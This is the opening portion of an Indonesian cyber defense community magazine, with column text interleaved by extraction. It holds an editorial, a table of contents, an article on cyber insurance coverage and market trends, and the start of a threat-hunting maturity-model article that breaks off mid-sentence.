CDEF Magazine Edisi Ke 2

Edisi Kedua | Edisi Khusus
CDEF Magazine
Cyber Defense Community TURUT SERTA MENCERDASKAN KEHIDUPAN BANGSA
BERKENALAN DENGAN SRIKANDI

KEAMANAN SIBER INDONESIA
HOT TOPICS
MEMBEDAH WANNAMINE MALWARE
TUTORIAL
MEMBANGUN WAF SENDIRI DENGAN OPENRESTY
MITIGASI SPECTRE DAN MELTDOWN
Cyber Defense Community | Q2 2018 GRATIS TIDAK DIPERJUAL BELIKAN SECARA KOMERSIL
Magazine Kata Pengantar
Cyber Defense Community
Tim Redaksi  Salam Komunitas Cyber Defense Indonesia !!

Digit Oktavianto 
Adi Nugroho  Pepatah kuno menyebutkan “The first step is always the
Sida Nala Rukma J hardest”. Dengan berkat Tuhan YME, komunitas CDEF (Cyber
Wahyu Nuryanto Defense) Indonesia telah berhasil merampungkan majalah
CDEF Magazine di kuartal pertama 2018 lalu. Sesudah edisi
Tim Desain Grafis 
pertama terlewati, tantangan kami berikutnya adalah menjaga
Sida Nala Rukma J
konsistensi dan kontinuitas majalah CDEF sebagai sarana
komunikasi komunitas pemerhati cyber defense di Indonesia.
Tim Editor & Proof Reading 
Paulus Tamba  Edisi kedua ini adalah upaya kami menjaga konsistensi itu.
Rusdi Rachim 
Fransiskus Indromojo Bertepatan dengan peringatan hari Kartini, edisi bulan ini me-
Harun Al Rasyid nampilkan wawancara dengan salah satu perempuan pegiat
Bambang Susilo cyber defense Indonesia. Dari hasil bincang-bincang teman-
Rebiyana Maulana teman di grup komunitas, sepertinya belum cukup banyak
perempuan-perempuan pegiat cyber defense di Indonesia.
Penasihat 
Berawal dari keinginan untuk menyebarkan “virus” cyber de-
Rusdi Rachim
fense kepada perempuan-perempuan Indonesia, bersamaan
Harun Al Rasyid
dengan peluncuran majalah edisi kedua, komunitas CDEF
Kontak juga menggelar community meet-up yang mengundang be-
Kritik dan saran dapat dikirim- berapa narasumber pegiat cyber defense di Indonesia. Hara-
kan ke alamat e-mail redaksi pan kami tentu akan semakin banyak peminat cyber defense
redaksi@cdef.id   dengan keterwakilan perempuan yang tinggi.
Tak lupa kami mengucapkan terima kasih kepada para kon-

tributor, proof reader, serta reviewer di edisi kedua yang telah
meluangkan waktu di sela-sela aktivitas profesionalnya untuk
berkontribusi di majalah ini. Kami juga menyampaikan apresi-
asi yang tinggi atas animo dan feed-back dari para pembaca
majalah edisi pertama. Masukan dan saran anda semua ada-
lah penyemangat kami dalam melanjutkan misi mencerdaskan
kehidupan bangsa melalui publikasi CDEF Magazine.
1
Magazine
Cyber Defense Community
Kami sadar betul bahwa kontinuitas rilis majalah juga membu-

tuhkan peningkatan kualitas. Karenanya kami sangat
menunggu masukan, saran, kritik dari teman-teman pembaca
agar kami dapat meningkatkan kualitas majalah ini di edisi
berikutnya. Dan jangan lupa, anda-pun kami undang untuk
menyumbangkan tulisan, membagikan pengetahuan dan
pengalaman kepada sesama pegiat cyber defense.
Selamat membaca !!
Redaksi CDEF
2
CYBER HORIZON
1
CYBER INSURANCE
- ERYK BUDI PRATAMA
7
THREAT HUNTING 101 - PART 2 18

- DIGIT OKTAVIANTO
LINDUNGI PASSWORD ANDA UNTUK

MELINDUNGI DATA ANDA 28
- ERWIN JONATHAN
KELALAIAN MENGGANTI PASSWORD E-MAIL

GOOGLE ACCOUNT BERUJUNG PADA TER- 32
BONGKARNYA DATA BACKUP WHATSAPP
- RIYAN SURYA PRATAMA
TUTORIAL
2
DAFTAR ISI
CREATE YOUR OWN WAF WITH

40 OPENRESTY AND LUA-RESTY-WAF
- RENDRA PERDANA
MITIGASI SPECTRE & MELTDOWN

53 DENGAN KERNEL RETPOLINE
- RENDRA PERDANA
TOKOH
3
LEBIH DEKAT DENGAN SALAH SATU SRIKANDI
KEAMANAN SIBER INDONESIA - NORMIS SISILYA 65
- TIM REDAKSI
LEBIH DEKAT DENGAN SALAH SATU SRIKANDI

71
KEAMANAN SIBER INDONESIA - ANNISA FITRIANA
- TIM REDAKSI
LEBIH DEKAT DENGAN ELISABETH ‘IBETH’

78
DAMAYANTI SRIKANDI KEAMANAN SIBER
INDONESIA
- TIM REDAKSI
HOT TOPICS
4
WANNAMINE, MALWARE CANGGIH
83 PEMBAJAK CPU
- CHRISTOFER SIMBARA
DAFTAR ISI
EVENTS REPORT
5
3RD MEETUP - CYBER DEFENSE COMMUNITY DI
GRHA DATACOMM
104
- TIM REDAKSI
DATAFOCUS 2018 INDONESIA 111

- TIM REDAKSI
BLACKHAT ASIA 2018 - SINGAPORE 113
- TIM REDAKSI
ULASAN BUKU
6
NETWORK FORENSICS – PANDUAN ANALISIS
DAN INVESTIGASI PAKET DATA JARINGAN 118
MENGGUNAKAN WIRESHARK
- TIM REDAKSI
EFFECTIVE THREAT INTELLIGENCE –

BUILDING AND RUNNING AN INTEL FOR 119
YOUR ORGANIZATION
- TIM REDAKSI
CHALLENGE
7
122 TEKA TEKI SECURITY
- KONTRIBUTOR
DAFTAR ISI
OPINI PEMBACA
126 - KONTRIBUTOR
1 “As the world is increasingly
interconnected, everyone
CYBER HORIZON shares the responsibility of
securing cyberspace”
– Newton Lee
sumber :
https://i2.wp.com/www.mediatelecom.com.mx/wp-content/uploads/2018
/03/mediatelecom_internet_jb280318.jpg?fit=1920%2C1080
Cyber Insurance
ditulis oleh Eryk Budi Pratama
Latar Belakang melakukan investasi keamanan cyber un-

tuk membangun trust dengan para cus-
Berdasarkan The Global State of Informa- tomer. Hasil survei yang dilakukan oleh EY
tion Security® Survey 20181 yang dilaku- dalam 20th Global Information Information
kan oleh PwC, masih banyak perusahaan Security Survey 2017-182 juga menyatakan
yang belum secara maksimal melakukan bahwa sebagian besar pimpinan perusa-
perlindungan terhadap privasi, meskipun haan menambah lebih dari 25% anggaran
para pimpinan perusahaan telah mengiden- untuk keamanan cyber. Hasil dari kedua
tifikasi bahwa ancaman cyber merupakan survei tersebut menunjukkan bahwa kea-
ancaman bisnis yang paling mengkhawa- manan cyber tidak hanya masalah teknis
tirkan. Namun, sebagian besar pimpinan untuk departemen TI, namun juga menjadi
perusahaan juga memiliki komitmen untuk
Cyber Defense Community | Q2 2018 7

risiko yang harus dipahami dan dikelola evaluasi terhadap kemampuan perusahaan
dengan baik oleh Board dan C-level. dalam mengelola risiko cyber3.
Sebagai tanggapan dari risiko yang se- 1. Bagaimanakah proses manajemen

makin kompleks, market dari produk asu- risiko perusahaan dalam melakukan
ransi pun berkembang dimana pada saat evaluasi terhadap risiko cyber?
yang bersamaan perusahaan mencari pe- Apakah proses tersebut mencakup pe-
luang baru untuk mendapatkan informasi mahaman risiko bisnis, brand, dan
dalam melakukan pengelolaan risiko cyber regulasi yang terkait dengan cyber dari
yang lebih baik. Industri asuransi berusaha sudut pandang yang luas/holistik?
untuk mengembangkan produk di arena 2. Proses, kontrol, dan tools apa sajakah
risiko cyber. Salah satu tantangan yang di- yang digunakan oleh perusahaan un-
hadapi adalah kurangnya informasi historis tuk mencegah, mendeteksi, dan mere-
terkait penyalahgunaan dan kebocoran spon insiden keamanan cyber?
data yang disebabkan oleh serangan
3. Apa sajakah yang menjadi prioritas
cyber yang dapat digunakan untuk melaku-
dan investasi dalam pencegahan, pen-
kan estimasi kemungkinan terjadinya keru-
deteksian, dan respon terhadap insi-
gian dan menghitung nilai kerugian dari su-
den keamanan cyber? Misalnya, jika
atu insiden keamanan cyber.
bisnis memprioritaskan pencegahan
Sebelum melakukan identifikasi dan in- serangan cyber, bagaimana investasi
teraksi dengan perusahaan asuransi, peru- dalam pencegahan dibandingkan den-
sahaan disarankan untuk menentukan be- gan pengeluaran perusahaan untuk me-
berapa pertanyaan berbasis risiko berikut lakukan pendeteksian, respon, dan
tentang bagaimana cyber insurance dapat analisis forensik?
memenuhi kebutuhan perusahaan. Menen- 4. Apakah perusahaan memiliki program
tukan pertanyaan yang tepat dapat mem- cyber-defense yang proaktif? Jika iya,
bantu untuk menjelaskan bagaimana cyber apakah perusahaan mengintegrasikan
insurance dapat melindungi bisnis, jenis threat intelligence dan threat assess-
produk asuransi dan cakupan yang opti- ment ke dalam program tersebut?
mal, dan bagaimana melakukan prioritisasi 5. Aset data mana sajakah yang paling
sumber daya terkait. Berikut adalah be- bernilai bagi penyerang (adversaries)?
berapa pertanyaan untuk melakukan Apakah investasi keamanan cyber sela-

ras dengan kemampuan penyerang / bangi biaya yang dibutuhkan untuk melaku-
threat actor untuk mencuri atau mem- kan recovery setelah terjadinya insiden
bahayakan aset terse-
but?
6. Apakah pemangku
kepentingan perusa-
haan memahami
ancaman-ancaman
terhadap bisnis?
7. Apakah pimpinan pe-
rusahaan memahami
faktor-faktor yang da- Gambar 1 Pertumbuhan jumlah pembelian produk Cyber Insurance5
pat meningkatkan at- yang terkait dengan keamanan cyber atau

tack surface dari perusahaan? sejenisnya. Berdasarkan hasil survei5, ter-
8. Bagaimana perusahaan mengintegrasi- dapat pertumbuhan terhadap jumlah pem-
kan risiko cyber ke dalam strategi kea- belian produk cyber insurance.
manan informasi?
Pertumbuhan pasar asuransi khususnya
Beberapa pertanyaan di atas dapat mem-
cyber insurance menyebabkan meningkat-
bantu perusahaan dalam mengidentifikasi
nya jumlah klaim.
gap dari kemampuan dalam mengelola
risiko cyber dan membantu perusahaan da-
lam memilih produk cyber insurance yang
paling sesuai dengan kebutuhan.
Pertumbuhan Pasar Cyber

Insurance
Cyber Insurance merupakan produk asu-
ransi yang digunakan untuk melindungi
bisnis dari risiko cyber4. Cyber Insurance
dirancang untuk membantu perusahaan da-
lam memitigasi risiko dengan mengim-

biaya yang harus dikeluarkan perusa-
haan untuk mengatasi pelanggaran
yang berkaitan dengan keamanan
cyber.
2. Penggunaan data yang masif. Pen-

ingkatan penggunaan sosial media se-
bagai saran untuk meningkatkan jang-
kauan terhadap konsumen telah
menghasilkan proliferasi data, mis-
alnya penggunaan teknologi seperti
perangkat mobile, cloud computing,
dan lain-lain yang dapat meningkatkan
Gambar 2 Persentase klaim asuransi berdasarkan penyebabnya6 jumlah penyimpanan data.
3. Kerentanan pada pihak ketiga. Se-

Grafik di atas menunjukkan jumlah persen- makin banyak vendor dan pihak ketiga
tase klaim berdasarkan penyebabnya. yang memproses data konsumen
Sumber klaim terbanyak berasal dari seran- menyebabkan bertambahnya kerenta-
gan hacker. nan keamanan.
Penggerak Pasar Cyber Insurance 4. Implikasi regulasi. Adanya kewajiban

perusahaan dalam memenuhi kebutu-
Peningkatan jumlah serangan cyber yang han regulasi, misalnya regulasi per-
dapat memberikan ancaman terhadap bankan yang diatur oleh Bank Indone-
risiko reputasi, mendorong pertumbuhan sia dan OJK (Otoritas Jasa Keuangan).
permintaan cyber insurance yang dapat
dikustomisasi sesuai kebutuhan perusa- 5. Ancaman cyber. Peningkatan keja-
haan. Berikut adalah beberapa faktor pen- hatan cyber serta awareness akan
d o ro n g p e r t u m b u h a n p a s a r c y b e r masalah dan risiko yang terkait den-
insurance7. gan reputasi mendorong pertumbuhan
permintaan terhadap cyber insurance,
1. Biaya dari adanya pelanggaran kea- khususnya yang bisa dikustomisasi se-
manan cyber. Terdapat peningkatan suai dengan kebutuhan perusahaan.

Jenis dan Cakupan Cyber ๏ Pelanggaran penggunaan data/
Insurance privasi. Misalnya, pengeluaran terkait

manajemen dari sebuah insiden, proses
Berdasarkan jenis cakupan terhadap pihak investigasi, remediasi, biaya hukum,
yang tertanggung asuransi 8 , Cyber dan denda dari regulator.
Insurance dapat dibedakan menjadi dua
๏ Kerusakan aset digital (multimedia/
jenis, yaitu:
media). Kerusakan yang terhadap aset
๏ Pihak Pertama (First Party). Cakupan digital, misalnya web defacement dan
pihak pertama menjamin kerugian atau pelanggaran hak kekayaan intelektual.
kebocoran atas data pemegang polis
dan insiden yang dapat menyebabkan ๏ Pemerasan (extortion). Kerugian yang
kebocoran data atau gangguan operasi- disebabkan oleh ancaman pemerasan
nal atas serangan cyber. Contoh dari dan biaya profesional yang terkait
cakupan pihak pertama adalah pencu- dengan aktivitas pemerasan.
rian data, fraud, investigasi forensik, in-
๏ Keamanan jaringan. Kerusakan yang
terupsi bisnis, pelanggaran penggunaan
disebabkan oleh denial of access, biaya
data, dan pemerasan.
yang terkait dengan data pada pihak
๏ Pihak Ketiga (Third Party). Cakupan ketiga penyedia jasa/produk, dan biaya
pihak ketiga menjamin tanggung jawab terkait pencurian data pada sistem.
pemegang polis kepada pihak ketiga
Beberapa elemen dari pertanggungan
termasuk klien dan entitas pemerintah
cyber insurance mungkin dapat saling ber-
yang timbul dari pelanggaran penggu-
hubungan atau tumpang tindih dengan asu-
naan data atau serangan cyber. Contoh
ransi yang saat ini digunakan oleh perusa-
dari cakupan pihak ketiga adalah liti-
haan. Meskipun ada kemungkinan terjadi
gasi, respon regulator, biaya notifikasi
tumpang tindih, kebijakan cyber insurance
pelanggaran, manajemen krisis, dan
yang layak dapat menjamin bahwa risiko-
tanggung jawab privasi.
risiko keamanan cyber telah diidentifikasi
Secara umum, produk cyber insurance dan dicakup dalam polis asuransi.
mencakup namun tidak terbatas pada9:

Manfaat dan Batasan dari Cyber dan hukuman atas pelanggaran terkait
keamanan cyber.
Insurance
๏ Menutupi biaya dari kebocoran data.
Berikut adalah beberapa manfaat yang di-
Banyak perusahaan yang menemukan
dapatkan oleh perusahaan dalam menggu-
bahwa cyber insurance dapat mem-
nakan cyber insurance10.
bantu mengatasi biaya tak terduga dan
๏ Mengurangi gap antara cakupan asu- menanggung sebagian dari biaya kebo-
ransi tradisional dengan kebutuhan coran data, khususnya biaya terkait noti-
perusahaan saat ini. Kebijakan asu- fikasi atas kebocoran data.
ransi tradisional (selain cyber insurance)
๏ Menyediakan sumber daya dalam me-
tidak secara eksplisit mencakup biaya
lakukan respon atas kebocoran data.
yang dikeluarkan saat melakukan
Perusahaan asuransi dapat meny-
proses pemberitahuan pelanggaran oleh
ediakan referensi penyedia layanan
pihak pertama. Hal ini dapat meningkat-
yang mencakup forensik, notifikasi kebo-
kan risiko adanya celah yang signifikan
coran data, hukum, Public Relation, dan
dalam aset digital perusahaan yang
lain-lain. Terkadang penggunaan vendor
menjadi cakupan dari produk asuransi
yang telah disetujui oleh perusahaan as-
yang saat ini dimiliki oleh perusahaan,
uransi dapat meningkatkan batas caku-
sehingga perusahaan tidak dapat mela-
pan asuransi.
kukan klaim terhadap biaya yang harus
dikeluarkan jika terjadi insiden kea- Sedangkan batasan yang biasanya terda-
manan cyber yang mengakibatkan kebo- pat pada cyber insurance adalah sebagai
coran data. Cyber Insurance dirancang berikut10.
untuk mencakup aset-aset digital peru-
sahaan yang masuk dalam ruang ling- ๏ Batasan cakupan asuransi. Tidak se-
kup tanggungan. Menurut The Betterley mua kebijakan asuransi memiliki caku-
Report, Cyber Insurance biasanya meny- pan yang sama. Beberapa kebocoran
ediakan cakupan untuk: (1) kewajiban data kadang tidak disebabkan oleh kesa-
atas pelanggaran atau kebocoran data, lahan dari pemilik data, namun oleh
(2) biaya remediasi dalam menanggapi penyedia layanan atau pihak ketiga,
insiden keamanan cyber, dan (3) denda misalnya penyedia layanan cloud. Seba-
gai contoh di sektor kesehatan, pemilik

data (rumah sakit atau penyedia asu- harus secara reguler menilai risiko kea-
ransi kesehatan) sering bertanggung ja- manan informasi dan melakukan miti-
wab atas kebocoran informasi kese- gasi terhadap gap yang ditemukan.
hatan (misalnya data pasien / rekam me-
dis) yang disebabkan oleh rekan bisnis Pertimbangan dalam memilih pro-
mereka. Oleh sebab itu, perusahaan duk Cyber Insurance
perlu memperhatikan sejauh mana caku-
pan dari produk cyber insurance yang Ada beberapa hal yang dapat diperhatikan
akan dipilih. dalam memilih kebijakan Cyber Insur-
ance11:
๏ Batasan pilihan. Kebijakan cyber
insurance juga dapat membatasi vendor ✓ Analisis cost-benefit. Menilai biaya
yang dapat dipilih untuk melakukan re- dan manfaat dari solusi yang ditawarkan
spon ketika terjadi kebocoran data. Ban- oleh perusahaan asuransi untuk memas-
yak perusahaan lebih memilih vendor tikan bahwa investasi yang dikeluarkan
yang saat ini telah menjalin kerjasama perusahaan untuk cyber insurance se-
dengan perusahaant tersebut, misalnya suai dengan kebutuhan dan ekspektasi
penasehat hukum, padahal perusahaan perusahaan.
asuransi memiliki prasyarat untuk meng-
✓ P ro fil c y b e r r i s k . M e n g a n a l i s i s
gunakan pilihan vendor yang direferensi-
kejadian-kejadian terkait dengan kea-
kan dari awal.
manan informasi yang sebelumnya telah
๏ Tidak dapat sepenuhnya mengganti- terjadi baik dari internal maupun industri
kan tanggung jawab dalam perlindun- terkait.
gan data. Meskipun telah menggu-
✓ Kematangan (maturity) dan kapabili-
nakan produk cyber insurance dengan
tas keamanan informasi. Menilai ke-
cakupan yang komprehensif, perusa-
matangan dan kapabilitas dari praktik
haan masih memiliki tanggung jawab un-
keamanan informasi perusahaan untuk
tuk meningkatkan pengukuran dan kapa-
menentukan postur keamanan informasi
bilitas keamanan cyber internal. Pence-
saat ini.
gahan masih merupakan bentuk asu-
ransi terbaik dalam melindungi perusa- ✓ Budaya risiko perusahaan. Meninjau
haan atas kebocoran data. Perusahaan praktik dan prosedur risiko dan kea-

Gambar 3 Tantangan dalam menjual produk cyber insurance
manan informasi yang diadopsi dan informasi tentang manajemen keamanan

diimplementasikan perusahaan. cyber. Kekhawatiran sejumlah perusahaan
asuransi adalah ketidakpastian dari akumu-
Tantangan dalam menjual produk lasi risiko, misalnya adanya migrasi data
Cyber Insurance dan operasional ke cloud. Jika terkadi insi-
den, perusahaan asuransi tidak dapat me-
Tantangan terbesar dari perusahaan asu- mastikan jumlah pelanggan yang akan ter-
ransi adalah kurangnya data insiden kea- pengaruh. Beberapa hal berikut juga men-
manan cyber dalam mendukung penilaian jadi tantangan dari perusahaan asuransi12.
risiko, dimana data tersebut kemudian me-
mungkinkan perusahaan asuransi dalam ๏ Kurangnya awareness dari konsumen
melakukan klasifikasi pelanggan berdasar- terhadap cyber insurance
kan hasil penilaian risiko. Pengumpulan ba- ๏ Pemahaman umum terhadap syarat dan
sis data untuk insiden cyber dapat mem- ketentuan yang tertera pada polis asu-
bantu perusahaan asuransi lebih mema- ransi
hami risiko dalam menyediakan perlindun-
๏ Kurangnya keahlian internal perusahaan
gan yang disesuaikan dengan profil risiko
dalam melakukan identifikasi dan kajian
pelanggan. Tantangan terkait data yang
risiko secara teknis
lainnya adalah bagaimana mengumpulkan

๏ Perhitungan biaya berdasarkan skenario Penilaian risiko keamanan cyber. Me-
kejadian lakukan identifikasi risk exposure dan
memberikan informasi yang cukup ke-
๏ Pemanfaatan predictive analytics untuk
pada perusahaan dalam menentukan
melakukan penilaian terhadap potensi
keputusan untuk mengalokasikan sum-
risiko dan dampak insiden cyber
ber daya pada area-area yang lemah
Keterlibatan konsultan indepen- atau rentan terhadap ancaman cyber.
den untuk membantu perusahaan
Riset pasar. Melakukan evaluasi terha-
dalam memilih produk Cyber
dap kebijakan cyber insurance yang di-
Insurance tawarkan oleh beberapa perusahaan
asuransi dan tren keamanan cyber
Dalam menentukan analisis kebutuhan ter-
yang saat ini terjadi.
hadap cyber insurance, pada umumnya
perusahaan membutuhkan saran dan Manfaat yang diharapkan oleh perusahaan
rekomendasi dari pihak ketiga independen dari konsultan dapat berupa namun tidak
(konsultan) dalam mengidentifikasi profil terbatas pada hal-hal berikut.
risiko, khususnya yang terkait dengan kea-
manan cyber dan juga dalam melakukan ๏ Benchmark terhadap program kea-
identifikasi terhadap produk dari perusa- manan informasi utnuk membandingkan
haan asuransi tertentu yang sesuai dengan tingkat kematangan perusahaan terha-
kebutuhan perusahaan. Konsultan dapat dap kompetitor.
menerapkan pendekatan yang terstruktur
๏ Rekomenasi strategis dan taktis untuk
dalam memahami risiko keamanan cyber
mengatasi kebutuhan bisnis dan gap
untuk mengidentifikasi area mana saja
keamanan informasi.
yang memiliki kerentanan keamanan dan
melakukan evaluasi terhadap lingkungan ๏ Laporan hasil analisis terhadap tren dari
risiko perusahaan. Selain itu, konsultan cyber insurance.
menggunakan metode riset pasar untuk
mengidentifikasi perusahaan-perusahaan ๏ Perspektif terhadap lanskap cyber insur-
yang menawarkan produk cyber insurance ance yang dapat dikustomisasi sesuai
kebutuhan perusahaan.

Kesimpulan (3) Managing cyber risks with insurance Key factors
to consider when evaluating how cyber insurance
can enhance your security program.
Hasil survei dari beberapa lembaga menun-
https://www.pwc.com.tr/tr/risk-surec-teknoloji-hizm
jukkan peningkatan potensi ancaman, ser- etleri/bilgi-guvenligi-ve-siber-guvenlik-yayinlari/siber
angan, dan kejahatan cyber setiap tahun- -risk-sigortasi-hakkinda-bilinmesi-gerekenler-pwc-
nya. Perusahaan idealnya telah mengidenti- managing-cyber-risks-with-insurance.pdf
fikasi dan menentukan profil risiko masing- (4) What is cyber insurance and why you need it.
masing. Dalam konteks cyber insurance, https://www.cio.com/article/3065655/cyber-attacks
perusahaan perlu untuk mengidentifikasi -espionage/what-is-cyber-insurance-and-why-you-
need-it.html
risiko dan ancaman yang terkait dengan
keamanan cyber karena hal ini tidak hanya (5) Information Security And Cyber Liability Risk
jadi perhatian departemen TI, namun juga Management.
http://www.advisenltd.com/wp-content/uploads/20
dapat menjadi perhatian bisnis karena da-
15/10/information-security-cyber-liability-risk-mana
pat memberikan dampak terhadap repu- gement-report-2015-10-16.pdf
tasi perusahaan. Cyber insurance dapat di-
jadikan salah satu alternatif perusahaan da- (6) 2 0 1 7 C y b e r C l a i m s S t u d y .
https://netdiligence.com/wp-content/uploads/2017/
lam melakukan pengalihan risiko (risk trans-
10/2017-NetDiligence-Claims-Study_Public-Edition.
fer) untuk mengurangi dampak dari adanya pdf
serangan cyber yang dapat menyebabkan
(7) Economic crime: A threat to business globally.
penyalahgunaan dan kebocoran data serta
https://www.pwc.at/de/publikationen/global-econo
gangguan terhadap operasional bisnis. mic-crime-survey-2014.pdf
(8) United States: A Buyer’s Guide To Cyber Insur-

a n c e .
Referensi http://www.mondaq.com/unitedstates/x/267482/Ins
urance/A+Buyers+Guide+To+Cyber+InsuranceMan
(1) The Global State of Information Security® Sur- aging%20cyber%20risks%20with%20insurance
vey 2018.
(9) An introduction to cyber liability insurance cover.
https://www.pwc.com/us/en/cybersecurity/informati
http://www.computerweekly.com/news/2240202703
on-security-survey.html
/An-introduction-to-cyber-liability-insurance-cover
(2) EY Global Information Security Survey 2017-18.
(10) The Benefits and Limitations of Cyberinsurance.
http://www.ey.com/gl/en/services/advisory/ey-globa
http://www.riskmanagementmonitor.com/the-benefi
l-information-security-survey-2017-18
ts-and-limitations-of-cyberinsurance/

(11) Cyber Risk Culture Roundtable Readout.
https://www.dhs.gov/sites/default/files/publications/
cyber-risk-culture-roundtable-readout_0.pdf
(12) Cyber Insurance: Recent Advances, Good Prac-

tices and Challenges.
https://www.enisa.europa.eu/publications/cyber-ins
urance-recent-advances-good-practices-and-challe
nges/at_download/fullReport
ERYK BUDI PRATAMA

CEH, OSWP, CSCU
Eryk Budi Pratama atau yang sering disapa Eryk,

merupakan salah satu senior consultant di PwC
Indonesia yang memiliki pengalaman di bidang
Cybersecurity, Digital Transformation, IT Strategy
& Governance, IT Risk Management, dan IT Com-
pliance. Di bidang Cybersecurity, Eryk memiliki be-
berapa pengalaman, antara lain Penetration
Testing, Cybersecurity Strategy Development,
Enterprise Security Architecture, ISMS/ISO 27001
Maturity Assessment dan IT Security Audit

Threat Hunting 101- Part 2
ditulis oleh Digit Oktavianto
Recap Threat Hunting 101 Part 1 mengimplementasikan Threat hunting?

Pada bagian akhir dari artikel tersebut, kita
Pada artikel di Majalah CDEF Edisi Q1 kita telah membahas mengenai 3 core compo-
telah membahas mengenai perkenalan se- nent yang sering kita dengar istilahnya,
putar Threat Hunting. Pada artikel sebe- yaitu : People, Process, dan Technology.
lumnya kita telah melihat beberapa poin Namun pada artikel sebelumnya kita baru
mengenai Traditional Security Monitoring membahas aspek People itu sendiri. Bagai-
vs Threat Hunting dan seperti apa perbe- mana skillset yang perlu dimiliki oleh se-
daannya. Lalu selain itu kita juga orang Security Analyst untuk melakukan ak-
membahas mengenai seberapa penting- tivitas hunting tersebut. Pada artikel kali ini
kah aktivitas Threat Hunting itu? serta akan dilanjutkan beberapa aspek lainnya
seperti apa keuntungan jika anda

yang merupakan hal yang fundamental karenakan rasio tingkat kesukesan dalam
dari aktivitas Threat Hunting itu sendiri. aktifitas hunting juga dipengaruhi oleh be-
berapa faktor :
Threat Hunting : Process
๏ Infrastruktur perimeter keamanan pendu-
Process tak kalah pentingnya dengan kom- kung (seperti : IDS/IPS/NGFW, Proxy,
ponen People pada pembahasan sebe- SIEM, Endpoint Security, Firewall, dll)
lumnya. Salah satu poin kunci dari tinggi- ๏ Standard, Kebijakan, dan Prosedur
nya tingkat kesuksesan (success rate) da- yang berkaitan dengan keamanan infor-
lam aktivitas hunting untuk menemukan masi
bad guys dalam suatu environment adalah
๏ Data set informasi yang dikumpulkan
Process dan Framework yang dibuat dan
untuk kemudian dianalisa oleh security
dikembangkan oleh organisasi untuk mela-
analyst
kukan aktivitas hunting ini. Dalam sebuah
White Paper1, Sqrrl menuliskan mengenai ๏ Sumber daya manusia terutama security
Framework Threat Hunting, yang kurang analyst yang melakukan aktivitas
lebih intinya adalah sebagai berikut : hunting
Beberapa elemen pendukung di atas akan

1. The Hunting Maturity Model
ada pada level apa Hunting Maturity Model
2. The Hunting Loop di dalam organisasi anda.
3. The Hunting Matrix
Mari kita coba kupas satu per satu poin di
HM0 (Hunting Maturity 0) – Initial
atas.
Level ini merupakan tingakat paling bawah
dari model kematangan ini. Pada model
1. The Hunting Maturity Model
ini, organisasi anda masih menggunakan
Sebelum kita membahas lebih jauh dan le- traditional security perimeter untuk mende-
bih dalam mengenai Threat Hunting, ada teksi adanya “bad guys”. Contohnya
baiknya kita perlu melihat ke dalam organ- seperti masih menggunakan Anti Virus,
isasi kita untuk melakukan self assessment Firewall, NGFW (Next Generation Firewall),
untuk menentukan seberapa matang (ma- Proxy dan masih menerapkan skema “silo”
ture) dan seberapa “melek” organisasi kita untuk aktivitas security monitoring. Secu-
terhadap security related issue. Hal ini di- rity analyst cenderung bekerja secara

manual dengan mengidentifikasi manual dan rules untuk mlekukan otomatisasi da-
log dari setiap perangkat perimeter kea- lam proses deteksi anomali yang dikorelasi-
manan ataupun terhadap endpoint server kan dari beberapa sumber data (seperti
yang dikelola. Pergerakan security perangkat keamanan) yang diintegrasikan
monitoring activity pada HM0 sangat terba- ke dalam SIEM. Organisasi pada level ini
tas dikarenakan belum adanya integrasi hanya menggunakan model passive secu-
antara satu perangkat/server dengan rity monitoring untuk melihat dan mende-
perangkat lainnya. Hal ini biasa di sebut teksi jika terdapat suatu ancaman yang di-
dengan istilah “silo” monitoring. tujukan pada organisasinya. Sebagaimana
Gambar 1 : Threat Hunting Maturity Model
HM1 (Hunting Maturity 1) – Minimal kita ketahui bersama bahwasannya

Advance Threat saat ini, mempunya jang-
Pada level ini, security analyst sudah mulai kauan dan kapabiltas yang luar biasa he-
menggunakan beberapa otomasi dalam batnya. Berbagai macam perimeter kea-
menjalankan tugasnya untuk mempermu- manan dapat diterobos untuk kemudian
dah dalam melakukan analisis. Sebagai sang threat actor berhasil melakukan com-
contoh ilustrasi, security analyst akan men- promised pada infrastruktur target lalu
definisikan correlation rules berdasarkan menggunakan kekuatannya untuk men-
perimeter keamanan yang dimiliki oleh or- jalankan motif serangan yang ditujukan
ganisasi tersebut, lalu membuat use case pada organisasi yang menjadi targetnya.

Pada Level HM1 ini, akan ada banyak analyst tersebut. Untuk mencapai level ini,
sekali hal yang “missed” atau terlewat oleh tentunya butuh banyak jam terbang dan
security analyst. Security analyst juga latihan, sehingga seorang security ana-
cenderung hanya akan aktif bekerja di- lyst dengan insting dan pengetahuannya
mana jika terdapat alert atau notifikasi dapat membangun sebuah hipotesa, dan
pada perangkat anda, atau pada tools lalu kemudian berdasarkan hipotesa terse-
SIEM anda. but, dia mencari artifak yang dilakukan se-
cara prosedural berdasarkan apa yang te-
HM2 (Hunting Maturity 2) - Procedural lah dikembangkan dalam organisasi terse-
but.
Pada maturity level ini, suatu organisasi su-
dah dapat dikatakan memulai ke arah HM3 (Hunting Maturity 3) – Innovative
Threat Hunting yang mendekati best
practice usage. Pada model ini, security Pada tingkatan kematangan ini, suatu or-
analyst sudah dapat memetakan apa saja ganisasi sudah cukup rutin melakukan ak-
aktivitas yang dilakukan secara prosedural tivitas hunting sehingga sudah memahami
ketika melakukan hunting terhadap suatu seluk beluk seperti apa insiden keamanan
anomali atau ancaman tertentu. Sebagai yang umum terjadi. Pada level ini, suatu or-
contoh ketika seorang security analyst meli- ganisasi sudah beranjak dari skema prose-
hat ada suatu endpoint laptop yang mela- dural yang dilakukan pada HM2. Sebagai-
kukan permintaan resolve domain suatu mana kita ketahui bersama bahwasanya
web dengan domain axdfrgrdkcmf[.]com ancaman selalu berkembang dengan ce-
(indikasi ke arah DGA Domain), maka secu- pat dan threat actor selalu mempunyai
rity analyst tersebut sudah mempunyai cara yang berbeda untuk melakukan infil-
baseline prosedur untuk melakukan trasi dan penyerangan. Jika hanya terus
hunting artifak mana saja yang dapat dia menerus mengandalkan Threat Hunting
peroleh untuk melakukan investigasi pada HM2, maka akan sangat mudah secu-
adanya permohonan anomali dari endpoint rity analyst dikelabui oleh threat actor di-
laptop tersebut. Security analyst tersebut karenakan ada banyak kombinasi cara
sudah mempunyai “pegangan” perangkat yang dilakukan untuk kemudian menero-
apa saja yang akan dia perlukan untuk me- bos mekanisme prosedural hunting terse-
mulai proses investigasi berdasarkan dari but. Pada level ini, suatu organisasi tidak
hipotesa yang dikembangkan oleh security hanya bergantung pada prosedur yang te-

lah dibuat, namun lebih kepada melakukan security analyst. Pada HM3 tingkat keber-
